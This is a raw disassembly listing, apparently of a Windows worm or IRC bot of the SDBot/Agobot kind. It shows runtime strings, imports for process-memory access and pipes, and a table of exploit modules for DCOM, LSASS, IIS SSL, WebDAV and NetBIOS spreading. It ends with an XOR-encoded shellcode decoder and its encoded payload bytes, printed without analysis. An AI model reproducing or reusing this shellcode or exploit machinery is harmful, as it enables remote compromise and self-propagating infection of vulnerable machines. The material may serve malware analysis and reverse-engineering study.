; DATA XREF: .text:004186A5�o
align 8
byte_42BE98 db 6 ; DATA XREF: sub_418A1C:loc_418A7D�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .text:off_43238C�o
unicode 0, <(null)>,0
align 4
aNull_1 db '(null)',0 ; DATA XREF: .text:off_432388�o
align 10h
stru_42BF10 _msEH <0FFFFFFFFh, offset loc_41979A, offset loc_41979E>
; DATA XREF: sub_4192C5+5�o
align 10h
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 20h, 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
stru_42C0A0 _msEH <0FFFFFFFFh, 0, offset sub_41A030> ; DATA XREF: sub_419FFE+2�o
align 10h
stru_42C0B0 _msEH <0FFFFFFFFh, 0, offset sub_41AE8A> ; DATA XREF: sub_41AE16+2�o
align 10h
stru_42C0C0 _msEH <0FFFFFFFFh, 0, offset sub_41B033> ; DATA XREF: sub_41AF67+2�o
dd 2 dup(0)
dd offset sub_41B002
stru_42C0D8 _msEH <0FFFFFFFFh, 0, offset sub_41B4D8> ; DATA XREF: sub_41B454+2�o
align 8
stru_42C0E8 _msEH <0FFFFFFFFh, 0, offset sub_41BB40> ; DATA XREF: sub_41BA2A+2�o
align 8
dbl_42C0F8 dq 0.0 ; DATA XREF: sub_41BBD3+6�r
dword_42C100 dd 30302B65h, 30hdbl_42C108 dq 1.0 ; DATA XREF: sub_41BF71+2A�r
dbl_42C110 dq 4.195835e6 ; DATA XREF: sub_41BF71+F�r
dbl_42C118 dq 3.145727e6 ; DATA XREF: sub_41BF71+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_41BFB1+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_41BFB1�o
align 4
dword_42C148 dd 2 dup(0) ; sub_41E950+1E�o ...
stru_42C150 _msEH <0FFFFFFFFh, offset loc_41C4A2, offset loc_41C4A6>
; DATA XREF: sub_41C1A9+2�o
dd 0FFFFFFFFh, 41C29Fh, 41C2A3h, 0FFFFFFFFh, 41C36Dh, 41C371h
dd 0
db 2 dup(0)
word_42C17A dw 20h ; DATA XREF: sub_4208E4+18�r
; .text:004323F0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 41h dup(0)
db 2 dup(0)
word_42C382 dw 20h ; DATA XREF: .text:off_432A64�o
aHH_0:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h, 0
stru_42C588 _msEH <0FFFFFFFFh, offset sub_41C582, offset loc_41C586>
; DATA XREF: sub_41C596-2F�o
align 8
stru_42C598 _msEH <0FFFFFFFFh, 0, offset sub_41C770> ; DATA XREF: sub_41C6C3+2�o
align 8
dd offset loc_41C736
dd offset loc_41C73F
stru_42C5B0 _msEH <0FFFFFFFFh, offset sub_41C7C5, offset loc_41C7CE>
; DATA XREF: sub_41C791+2�o
align 10h
stru_42C5C0 _msEH <0FFFFFFFFh, 0, offset sub_41C930> ; DATA XREF: sub_41C7F3+2�o
align 10h
dd offset loc_41C878
dd offset loc_41C8BB
stru_42C5D8 _msEH <0FFFFFFFFh, offset sub_41CB0A, offset loc_41CB0E>
; DATA XREF: sub_41C99A+2�o
align 8
stru_42C5E8 _msEH <0FFFFFFFFh, offset loc_41CEE6, offset loc_41CEEA>
; DATA XREF: sub_41CEC1+2�o
align 8
stru_42C5F8 _msEH <0FFFFFFFFh, offset loc_41CF13, offset loc_41CF17>
; DATA XREF: sub_41CEF6+2�o
align 8
stru_42C608 _msEH <0FFFFFFFFh, 0, offset sub_41D1C9> ; DATA XREF: sub_41D166+2�o
align 8
stru_42C618 _msEH <0FFFFFFFFh, 0, offset sub_41D4B2> ; DATA XREF: sub_41D36B+2�o
align 8
stru_42C628 _msEH <0FFFFFFFFh, 0, offset sub_41D646> ; DATA XREF: sub_41D614+2�o
align 8
stru_42C638 _msEH <0FFFFFFFFh, offset loc_41D68B, offset loc_41D68F>
; DATA XREF: sub_41D65E+2�o
align 8
stru_42C648 _msEH <0FFFFFFFFh, offset loc_41D6CF, offset loc_41D6D3>
; DATA XREF: sub_41D6A2+2�o
align 8
stru_42C658 _msEH <0FFFFFFFFh, 0, offset sub_41D7DE> ; DATA XREF: sub_41D75A+2�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_432B7C�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_41D967+12C�o
; sub_42055D+134�o
align 4
asc_42C988 db 0Ah ; DATA XREF: sub_41D967+110�o
; sub_42055D+101�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_41D967+FE�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_41D967+CA�o
; sub_42055D+D1�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41D967+89�o
; sub_42055D+88�o
align 8
stru_42C9C8 _msEH <0FFFFFFFFh, 0, offset sub_41E502> ; DATA XREF: sub_41E47E+2�o
align 8
stru_42C9D8 _msEH <0FFFFFFFFh, 0, offset sub_41E6C5> ; DATA XREF: sub_41E61E+2�o
align 8
stru_42C9E8 _msEH <0FFFFFFFFh, offset loc_41EA29, offset loc_41EA2D>
; DATA XREF: sub_41E950+2�o
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .text:00432D6C�o
aMmDdYy db 'MM/dd/yy',0
align 4
aDecember db 'December',0
align 10h
aNovember db 'November',0
align 4
aOctober db 'October',0
aSeptember db 'September',0
align 10h
aAugust db 'August',0
align 4
aJuly db 'July',0
align 10h
aJune db 'June',0
align 4
aApril db 'April',0
align 10h
aMarch db 'March',0
align 4
aFebruary db 'February',0
align 4
aJanuary db 'January',0
aDec db 'Dec',0
aNov db 'Nov',0
aOct db 'Oct',0
aSep db 'Sep',0
aAug db 'Aug',0
aJul db 'Jul',0
aJun db 'Jun',0
aMay db 'May',0
aApr db 'Apr',0
aMar db 'Mar',0
aFeb db 'Feb',0
aJan db 'Jan',0
aSaturday db 'Saturday',0
align 4
aFriday db 'Friday',0
align 10h
aThursday db 'Thursday',0
align 4
aWednesday db 'Wednesday',0
align 4
aTuesday db 'Tuesday',0
aMonday db 'Monday',0 ; DATA XREF: .text:00432CE8�o
align 4
aSunday db 'Sunday',0 ; DATA XREF: .text:00432CE4�o
align 10h
aSat db 'Sat',0 ; DATA XREF: .text:00432CE0�o
aFri db 'Fri',0 ; DATA XREF: .text:00432CDC�o
aThu db 'Thu',0
aWed db 'Wed',0
aTue db 'Tue',0 ; DATA XREF: .text:00432CD0�o
aMon db 'Mon',0 ; DATA XREF: .text:00432CCC�o
aSun db 'Sun',0 ; DATA XREF: .text:off_432CC8�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_41EFD0+2D�o
align 8
stru_42CB38 _msEH <0FFFFFFFFh, offset loc_41F02D, offset loc_41F03B>
; DATA XREF: sub_41EFD0+2�o
align 8
stru_42CB48 _msEH <0FFFFFFFFh, 0, offset sub_41F83B> ; DATA XREF: sub_41F79E+2�o
align 8
stru_42CB58 _msEH <0FFFFFFFFh, 0, offset sub_41F8EC> ; DATA XREF: sub_41B0EE+476E�o
align 8
stru_42CB68 _msEH <0FFFFFFFFh, 0, offset sub_41FC21> ; DATA XREF: sub_41FBDC+2�o
align 8
stru_42CB78 _msEH <0FFFFFFFFh, offset loc_42040D, offset loc_420411>
; DATA XREF: sub_420338+2�o
dword_42CB84 dd 676F7250h, 3A6D6172h, 20haABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: sub_42055D+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: sub_42055D:loc_4205BA�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: sub_42055D+4F�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: sub_42055D+4A�o
align 4
stru_42CD28 _msEH <0FFFFFFFFh, offset loc_420598, offset loc_42059C>
; DATA XREF: sub_42055D+5�o
align 8
stru_42CD38 _msEH <0FFFFFFFFh, 0, offset sub_4207DF> ; DATA XREF: sub_420775+2�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_4207EB+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_4207EB+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_4207EB+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_4207EB+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_4207EB+2E�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 10h
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_421131:loc_421220�o
align 10h
a1Inf db '1#INF',0 ; DATA XREF: sub_421131+D2�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_421131+C1�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: sub_421131+A7�o
align 4
stru_42CE08 _msEH <0FFFFFFFFh, 0, offset sub_421526> ; DATA XREF: sub_4213F3+2�o
align 8
stru_42CE18 _msEH <0FFFFFFFFh, offset loc_421B60, offset loc_421B64>
; DATA XREF: sub_421A4A+2�o
dd 0FFFFFFFFh, 421BEDh, 421BF1h
stru_42CE30 _msEH <0FFFFFFFFh, offset loc_421DF1, offset loc_421DF5>
; DATA XREF: sub_421CFA+2�o
dd 0FFFFFFFFh, 421E63h, 421E67h, 0
dword_42CE4C dd 2 dup(0) ; sub_41D65E:loc_41D671�o
dword_42CE54 dd 0 ; sub_41D6A2:loc_41D6B5�o
dd 0FFFFFFFFh, 421F1Fh
dword_42CE60 dd 19930520h, 1, 42CE58h, 4 dup(0) dd 2CEB8h, 2 dup(0)
dd 2D680h, 22000h, 2D098h, 2 dup(0)
dd 2D68Eh, 221E0h, 5 dup(0)
dd 7C802442h, 7C80929Ch, 7C910331h, 7C810637h, 7C80B4CFh
dd 7C80C058h, 7C9010EDh, 7C901005h, 7C80B829h, 7C91188Ah
dd 7C80A7D4h, 7C809B47h, 7C810D87h, 7C801A24h, 7C80A427h
dd 7C82FA46h, 7C81CDDAh, 7C802367h, 7C814EEAh, 7C80EDD7h
dd 7C834EB1h, 7C8137D9h, 7C91043Dh, 7C9105D4h, 7C80ABC1h
dd 7C80E7ECh, 7C80E866h, 7C80B9A0h, 7C8021CCh, 7C812D56h
dd 7C8309E1h, 7C80ABDEh, 7C80F0F4h, 7C80ADA0h, 7C801D77h
dd 7C80180Eh, 7C810B8Eh, 7C810A77h, 7C83632Dh, 7C8361EEh
dd 7C81153Ch, 7C80B6A1h, 7C82F7A0h, 7C80FE82h, 7C80FF19h
dd 7C80B974h, 7C80B905h, 7C80945Ch, 7C831CB8h, 7C831C45h
dd 7C8329D9h, 7C812782h, 7C835DCAh, 7C809BF8h, 7C80A0D4h
dd 7C8216A4h, 7C80DDF5h, 7C831EABh, 7C801E16h, 7C80BAA1h
dd 7C81CE03h, 7C835E8Fh, 7C809920h, 7C8286EEh, 7C802520h
dd 7C80E93Fh, 7C81AE17h, 7C85F90Fh, 7C80DDFEh, 7C81E0C7h
dd 7C81B58Bh, 7C80D262h, 7C812ADEh, 7C830B14h, 7C873A31h
dd 7C80A05Dh, 7C8310F2h, 7C8312E5h, 7C832044h, 7C9109EDh
dd 7C80BCCFh, 7C809E01h, 7C84467Dh, 7C812641h, 7C81DC03h
dd 7C809EF1h, 7C80A490h, 7C9179FDh, 7C8017E5h, 7C937A40h
dd 7C801EEEh, 7C812F1Dh, 7C8136D7h, 7C910340h, 7C809728h
dd 7C809BC5h, 7C809740h, 7C812D9Fh, 7C810EF8h, 7C812BB6h
dd 7C809AE4h, 7C809A51h, 7C809E79h, 7C801AD0h, 7C80B9D1h
dd 7C838DE8h, 7C80CCA8h, 7C809915h, 7C8127A7h, 7C812E76h
dd 7C812F39h, 7C862E2Ah, 7C81DF77h, 7C81CF5Bh, 7C814AE7h
dd 7C812F08h, 7C80CC97h, 7C810E51h, 7C838A0Ch, 0
dd 71AB3EA1h, 71AB4519h, 71AB3E00h, 71AB88D3h, 71AB2DC0h
dd 71AB4544h, 71AC1028h, 71AB615Ah, 71AB428Ah, 71AB664Dh
dd 71AB3B91h, 71AB2BF4h, 71AB2B66h, 71AB406Ah, 71AB9639h
dd 71AB4428h, 0
db 29h ; )
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0BEh ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 5Ah ; Z
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
aE_0 db 'e',0
aCreatethread db 'CreateThread',0
align 4
db 65h ; e
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
aM_1 db '',0
aExitthread db 'ExitThread',0
align 4
db 2Dh ; -
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 10h
db '',0
aEntercriticals db 'EnterCriticalSection',0
align 4
db 3
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aV_0 db 'v',0
aDeletecritical db 'DeleteCriticalSection',0
db 5Ch ; \
db 1, 47h, 65h
aTlocaltime db 'tLocalTime',0
align 4
db ',',0
aClosehandle db 'CloseHandle',0
dw 376h
aWritefile db 'WriteFile',0
aJ_0 db 'J',0
aCreatefilea db 'CreateFileA',0
db 7Eh ; ~
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 27Fh
aQueryperform_1 db 'QueryPerformanceFrequency',0
db '',0
aExitprocess db 'ExitProcess',0
db '\',0
aCreateprocessa db 'CreateProcessA',0
align 2
dw 1A6h
aGetsystemdirec db 'GetSystemDirectoryA',0
db '',0
aFindclose db 'FindClose',0
db '',0
aFindnextfilea db 'FindNextFileA',0
db '',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
dw 1F5h
aHeapfree db 'HeapFree',0
align 2
dw 1EFh
aHeapalloc db 'HeapAlloc',0
dw 18Bh
aGetprocessheap db 'GetProcessHeap',0
align 4
db '',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 4
db '',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
dw 35Eh
aVirtualqueryex db 'VirtualQueryEx',0
align 4
db 93h ;
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
db 0A8h ;
db 1, 47h, 65h
aTsysteminfo db 'tSystemInfo',0
db 61h ; a
db 2, 4Fh, 70h
aEnprocess db 'enProcess',0
db '',0
aFreelibrary db 'FreeLibrary',0
db 43h ; C
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableW',0
dw 189h
aGetprocaddress db 'GetProcAddress',0
align 4
db 2Eh ; .
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 90h
db 2, 52h, 65h
aAdfile db 'adFile',0
align 10h
db 0F1h ;
db 2, 53h, 65h
aTfilepointer db 'tFilePointer',0
align 2
dw 14Dh
aGetfilesize db 'GetFileSize',0
db 0BFh ;
db 1, 47h, 65h
aTtimeformata db 'tTimeFormatA',0
align 2
dw 133h
aGetdateformata db 'GetDateFormatA',0
align 4
db 48h ; H
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 167h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
aR_0 db '',0
aFormatmessagea db 'FormatMessageA',0
align 10h
db 0E9h ;
db 1, 47h, 6Ch
aObalunlock db 'obalUnlock',0
align 10h
db 0E2h ;
db 1, 47h, 6Ch
aOballock db 'obalLock',0
align 2
dw 345h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 44h ; D
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aK_0 db 'K',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 2F5h
aSetfiletime db 'SetFileTime',0
dd 6547014Fh, 6C694674h, 6D695465h, 0AE0065h
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 2EFh
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 0B6h ;
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 4
db 51h ; Q
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 369h
aWidechartomult db 'WideCharToMultiByte',0
db 1
db 1, 47h, 65h
aTcomputernamea db 'tComputerNameA',0
align 4
db 2Fh ; /
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 'x',0
aDeletefilea db 'DeleteFileA',0
dw 331h
aTerminateproce db 'TerminateProcess',0
align 2
dw 395h
aLstrcmpia db 'lstrcmpiA',0
dw 332h
aTerminatethrea db 'TerminateThread',0
db 4Ah ; J
db 2, 4Dh, 6Fh
aVefilea db 'veFileA',0
db 30h ; 0
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcessId',0
db ':',0
aCopyfilea db 'CopyFileA',0
dw 365h
aWaitforsingleo db 'WaitForSingleObject',0
aW db 'W',0
aCreatemutexa db 'CreateMutexA',0
align 4
db 44h ; D
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 26Ch
aPeeknamedpipe db 'PeekNamedPipe',0
aI_1 db '',0
aDuplicatehandl db 'DuplicateHandle',0
db '[',0
aCreatepipe db 'CreatePipe',0
align 2
dw 2C8h
aSetconsolectrl db 'SetConsoleCtrlHandler',0
dw 15Dh
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 4
db 0C8h ;
db 1, 47h, 65h
aTversionexa db 'tVersionExA',0
db 61h ; a
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDrives',0
align 10h
db '',0
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 4
db 63h ; c
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 1E3h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 4
db 3Bh ; ;
db 3, 54h, 72h
aAnsactnamedpip db 'ansactNamedPipe',0
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
dw 1F9h
aHeaprealloc db 'HeapReAlloc',0
db 0ACh ;
db 1, 47h, 65h
aTsystemtimeasf db 'tSystemTimeAsFileTime',0
dw 2B1h
aRtlunwind db 'RtlUnwind',0
dw 19Ch
aGetstartupinfo db 'GetStartupInfoA',0
db 0FDh ;
align 2
aGetcommandline db 'GetCommandLineA',0
dw 337h
aTlsfree db 'TlsFree',0
db 0FEh ;
db 2, 53h, 65h
aTlasterror_0 db 'tLastError',0
align 4
db 32h ; 2
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 339h
aTlssetvalue db 'TlsSetValue',0
db 38h ; 8
db 3, 54h, 6Ch
aSgetvalue db 'sGetValue',0
dw 336h
aTlsalloc db 'TlsAlloc',0
align 2
dw 1F3h
aHeapdestroy db 'HeapDestroy',0
db 0F1h ;
db 1, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 358h
aVirtualfree db 'VirtualFree',0
db 55h ; U
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 14h
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 5Bh ; [
db 3, 56h, 69h
aRtualprotect db 'rtualProtect',0
align 2
dw 35Dh
aVirtualquery db 'VirtualQuery',0
align 2
dw 220h
aLcmapstringa db 'LCMapStringA',0
align 2
dw 221h
aLcmapstringw db 'LCMapStringW',0
align 2
aI_2 db '',0
aGetacp db 'GetACP',0
align 10h
db 7Ch ; |
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 0F1h ;
align 2
aGetcpinfo db 'GetCPInfo',0
db 9Eh ;
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 42h ; B
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
aU_0 db '',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 13Fh
aGetenvironment db 'GetEnvironmentStrings',0
aF db '',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 41h ; A
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStringsW',0
align 2
dw 2FAh
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470150h, 6C694674h, 70795465h, 19F0065h, 53746547h
dd 6E697274h, 70795467h, 4165h, 654701A2h, 72745374h, 54676E69h
dd 57657079h, 2020000h
aInitializecr_0 db 'InitializeCriticalSection',0
dw 30Ch
aSetstdhandle db 'SetStdHandle',0
align 2
db '',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 2
dw 31Dh
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 73490211h, 52646142h, 50646165h, 7274h, 7349020Eh, 43646142h
dd 5065646Fh, 7274h, 654801FBh, 69537061h, 657Ah, 655302E8h
dd 646E4574h, 6946664Fh, 656Ch, 1A6h dup(0)
dword_42E000 dd 0 dd offset sub_420507
dword_42E008 dd 0 dword_42E00C dd 0 dd offset sub_41B045
dd offset sub_41D4BB
dd offset sub_41D5EC
dd offset sub_4206ED
dword_42E020 dd 0 dword_42E024 dd 0 dd offset sub_41B0EE
dword_42E02C dd 0 dword_42E030 dd 0 ; DATA XREF: sub_418350:loc_4183DE�o
dd offset sub_420700
dword_42E038 dd 2 dup(0) aWebdav db 'webdav',0 ; DATA XREF: sub_40195E+155�o
align 4
db 2 dup(0)
aWebdav_0 db 'WebDav',0 ; DATA XREF: sub_413C88+2B2�o
; .text:00414873�o ...
align 4
dd 5 dup(0)
dword_42E068 dd 50h ; sub_409848+441F�r ...
off_42E06C dd offset sub_413C88 ; DATA XREF: sub_40195E+1F8�r
dword_42E070 dd 0 dword_42E074 dd 1 dword_42E078 dd 0 aNetbios db 'netbios',0
dd 654E0000h, 6F694274h, 73h, 5 dup(0)
dd 8Bh, 4161E0h, 3 dup(0)
aNtpass db 'ntpass',0
align 10h
dd 544E0000h, 73736150h, 6 dup(0)
dd 1BDh, 4161E0h, 3 dup(0)
aDcom135 db 'dcom135',0
dd 63440000h, 33316D6Fh, 35h, 5 dup(0)
dd 87h, 41459Ch, 0
dd 1, 0
aDcom445 db 'dcom445',0
dd 63440000h, 34346D6Fh, 35h, 5 dup(0)
dd 1BDh, 41459Ch, 0
dd 1, 0
aDcom1025 db 'dcom1025',0
align 2
aDcom1025_0 db 'Dcom1025',0
align 10h
dd 5 dup(0)
dd 401h, 41459Ch, 0
dd 1, 0
aDcom2 db 'dcom2',0
align 10h
dd 63440000h, 326D6Fh, 6 dup(0)
dd 87h, 4148D8h, 0
dd 1, 0
aIis5ssl db 'iis5ssl',0
dd 49490000h, 53533553h, 4Ch, 5 dup(0)
dd 1BBh, 414B0Bh, 0
dd 1, 0
aLsass_445 db 'lsass_445',0
aLsass_445_0 db 'lsass_445',0
dd 5 dup(0)
dd 1BDh, 4156C2h, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0039h, 5F737361h
dd 393331h, 5 dup(0)
dd 8Bh, 41588Dh, 0
dd 2 dup(1), 6974706Fh, 78h, 704F0000h, 786974h, 6 dup(0)
dd 0C44h, 4163ADh, 3 dup(0)
aKuang2 db 'kuang2',0
align 4
dd 754B0000h, 32676E61h, 6 dup(0)
dd 4394h, 414E76h, 12h dup(0)
aLsass_445_1 db 'lsass_445',0
byte_42E356 db 1 ; DATA XREF: sub_409848:loc_40DBDF�r
; sub_409848+43A3�o
aLsass_139 db 'lsass_139',0
db 1, 2 dup(0)
align 10h
loc_42E370: ; DATA XREF: .text:00414C1F�o
jmp short loc_42E382
; =============== S U B R O U T I N E =======================================
sub_42E372 proc near ; CODE XREF: sub_42E372:loc_42E382�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_42E37A: ; CODE XREF: sub_42E372+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42E37A
jmp short loc_42E387
; ---------------------------------------------------------------------------
loc_42E382: ; CODE XREF: .text:loc_42E370�j
call sub_42E372
loc_42E387: ; CODE XREF: sub_42E372+E�j
jo short near ptr dword_42E2FC+26h
cwde
cdq
cdq
retn
sub_42E372 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
